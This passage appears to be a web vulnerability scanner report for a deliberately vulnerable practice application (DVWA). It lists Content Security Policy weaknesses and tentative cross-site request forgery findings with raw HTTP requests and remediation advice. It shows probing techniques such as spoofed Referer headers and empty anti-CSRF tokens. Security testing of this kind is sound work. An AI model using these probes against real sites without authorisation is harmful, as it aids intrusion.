Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=724579ea60f345080dd53da2e8061fcb
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:44 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4868
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/xss_s/index.php/ln9pdr/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=724579ea60f345080dd53da2e8061fcb
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:55:44 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4868
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Stored Cross Site Scripting (XSS) :: Damn Vulnerable Web
...[SNIP]...
20. Content security policy: allowlisted script resources
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The Content Security Policy relies on an allowlist to control script-based resource loading. However, this approach is vulnerable if allowlisted domains host scripts susceptible to reflected or DOM-based XSS attacks. Additionally, JSONP-based endpoints can be abused too. These vulnerabilities could enable attackers to bypass the CSP, leading to untrusted JavaScript execution.
Issue background
Content Security Policy (CSP) is a security mechanism designed to mitigate cross-site scripting attacks by disabling dangerous behaviours such as untrusted JavaScript execution.
Websites can specify their security policy in a response header or meta tag, enabling fine-grained control over dangerous features like scripts and stylesheets.
Issue remediation
To prevent untrusted JavaScript execution, replace allowlisted resources in script-based directives with a secure, random nonce of at least 8 characters 'nonce-RANDOM'.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
21. Content security policy: allows untrusted style execution
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The content security policy fails to prevent untrusted style execution. As a result, it may fail to mitigate style based data exfiltration.
The policy allows global wildcard URLs which allows arbitrary styles to be executed.
The policy allows data: URLs which allows arbitrary styles to be executed.
Issue background
Content Security Policy (CSP) is a security mechanism designed to mitigate cross-site scripting attacks by disabling dangerous behaviours such as untrusted JavaScript execution.
Websites can specify their security policy in a response header or meta tag, enabling fine-grained control over dangerous features like scripts and stylesheets.
Issue remediation
Mitigate style-based data exfiltration by avoiding 'unsafe-inline', data: URLs, and global wildcards in style directives.
Use a secure, random nonce of at least 8 characters 'nonce-RANDOM' in the relevant directive.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
22. Content security policy: allows clickjacking
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The content security policy does not mitigate clickjacking attacks:
The frame-ancestors directive is not present in this content security policy.
Issue background
Content Security Policy (CSP) is a security mechanism designed to mitigate cross-site scripting attacks by disabling dangerous behaviours such as untrusted JavaScript execution.
Websites can specify their security policy in a response header or meta tag, enabling fine-grained control over dangerous features like scripts and stylesheets.
Issue remediation
We recommend that you set the frame-ancestors directive to 'none' if you do not want your site to be framed, or 'self' if you want to allow it to frame itself. In addition,
use the X-Frame-Options header with DENY or SAMEORIGIN, based on your needs.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
23. Content security policy: allows form hijacking
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Certain |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The content security policy doesn't prevent form hijacking, where attackers with HTML injection hijack forms using action attributes. This can lead to credential theft by autofilling passwords from a manager and sending them to an attacker's server upon form submission.
Issue background
Content Security Policy (CSP) is a security mechanism designed to mitigate cross-site scripting attacks by disabling dangerous behaviours such as untrusted JavaScript execution.
Websites can specify their security policy in a response header or meta tag, enabling fine-grained control over dangerous features like scripts and stylesheets.
Issue remediation
We recommend using the form-action directive in the CSP response header to control form post destinations. If no form actions are used, set form-action to 'none' to block
untrusted forms. For applications without external form URLs, use 'self' to allow only same-origin URLs. If needed, allow list hosts for external URL form submissions, but
be aware this lets attackers submit to these external resources.
References
Vulnerability classifications
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=cb699b2b01793adc893b18f04186aba0
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:36:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
24. Cross-site request forgery
Previous
Next
There are 8 instances of this issue:
Issue background
Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable application. For a request to be vulnerable to CSRF, the following conditions must hold:
- The request can be issued cross-domain, for example using an HTML form. If the request contains non-standard headers or body content, then it may only be issuable from a page that originated on the same domain.
- The application relies solely on HTTP cookies or Basic Authentication to identify the user that issued the request. If the application places session-related tokens elsewhere within the request, then it may not be vulnerable.
- The request performs some privileged action within the application, which modifies the application's state based on the identity of the issuing user.
- The attacker can determine all the parameters required to construct a request that performs the action. If the request contains any values that the attacker cannot determine or predict, then it is not vulnerable.
Issue remediation
The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an attacker to determine or predict the value of any token that was issued to another user. The token should be associated with the user's session, and the application should validate that the correct token is received before performing any action resulting from the request.
An alternative approach, which may be easier to implement, is to validate that Host and Referer headers in relevant requests are both present and contain the same domain name. However, this approach is somewhat less robust: historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate these headers to bypass such defenses.
References
Vulnerability classifications
24.1. https://pentest-ground.com:4280/security.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/security.php |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
The original request contains parameters that look like they may be anti-CSRF tokens, and the request fails if these are removed. However the request is successful if these parameters are assigned empty values.
Request 1
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=566828ad512195fc7f70051c62941fa5
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 80
security=medium&seclev_submit=Submit&user_token=08c1f17e279cac16b96cc74ab513b78f
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
Request 2
POST /security.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=566828ad512195fc7f70051c62941fa5
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pHlDmfZScDOGtE.com:4280/security.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 48
security=medium&seclev_submit=Submit&user_token=
Response 2
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:45 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=medium; path=/
Location: /security.php
24.2. https://pentest-ground.com:4280/setup.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/setup.php |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
The original request contains parameters that look like they may be anti-CSRF tokens, and the request fails if these are removed. However the request is successful if these parameters are assigned empty values.
Request 1
POST /setup.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=081f809da40a4b8b699413816223705b
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/setup.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 79
create_db=Create+%2F+Reset+Database&user_token=4a1dfd4cf8604a63dfb043bdb5be4962
Response 1
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:48:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /setup.php
Request 2
POST /setup.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=081f809da40a4b8b699413816223705b
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://XVhhEsLPpmgAjm.com:4280/setup.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 47
create_db=Create+%2F+Reset+Database&user_token=
Response 2
HTTP/1.1 302 Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:50:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /setup.php
24.3. https://pentest-ground.com:4280/vulnerabilities/csp/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csp/ |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
Request 1
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=258eb52ea54dcc77d6cc80dfdfca473c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:59 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
Request 2
POST /vulnerabilities/csp/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=258eb52ea54dcc77d6cc80dfdfca473c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://kOxespAytyorUf.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
24.4. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
Request 2
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://GCEXoGkhPfrYSs.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:04 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
24.5. https://pentest-ground.com:4280/vulnerabilities/exec/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0bd67b9beb0db5a6f9351116428b3354
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
